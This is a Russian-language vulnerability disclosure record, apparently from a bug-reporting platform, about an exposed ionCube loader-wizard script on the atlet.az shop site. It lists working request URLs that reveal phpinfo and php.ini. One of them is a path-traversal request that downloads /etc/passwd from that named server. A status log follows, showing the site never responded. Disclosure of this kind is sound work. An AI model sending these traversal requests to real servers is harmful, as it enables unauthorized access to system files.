Слабость о конфигурации веб-сервера

atlet.az 12 Декабрь 2016, 02:25

Подробная информация

Атакующий может получить информацию о phpinfo (), php.ini. Кроме того, есть возможность получить какие-либо файлы сервера.
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpinfo
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig&ininame=../../../../../../../etc/passwd&download=1

Подробная информация: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/

Записи

  • 23 Январь 2017, 13:15
    Статус уязвимости
    Нет ответа от источника

  • 15 Декабрь 2016, 11:46
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 14 Декабрь 2016, 13:25
    Уязвимости присвоен балл
    Модератор присвоил 7 баллов из 10-и на уязвимости

  • 14 Декабрь 2016, 13:19
    Статус уязвимости
    Подтверждено со стороны модератора

  • 12 Декабрь 2016, 02:25
    Добавлена уязвимость
    Добавлена уязвимость на BUGemot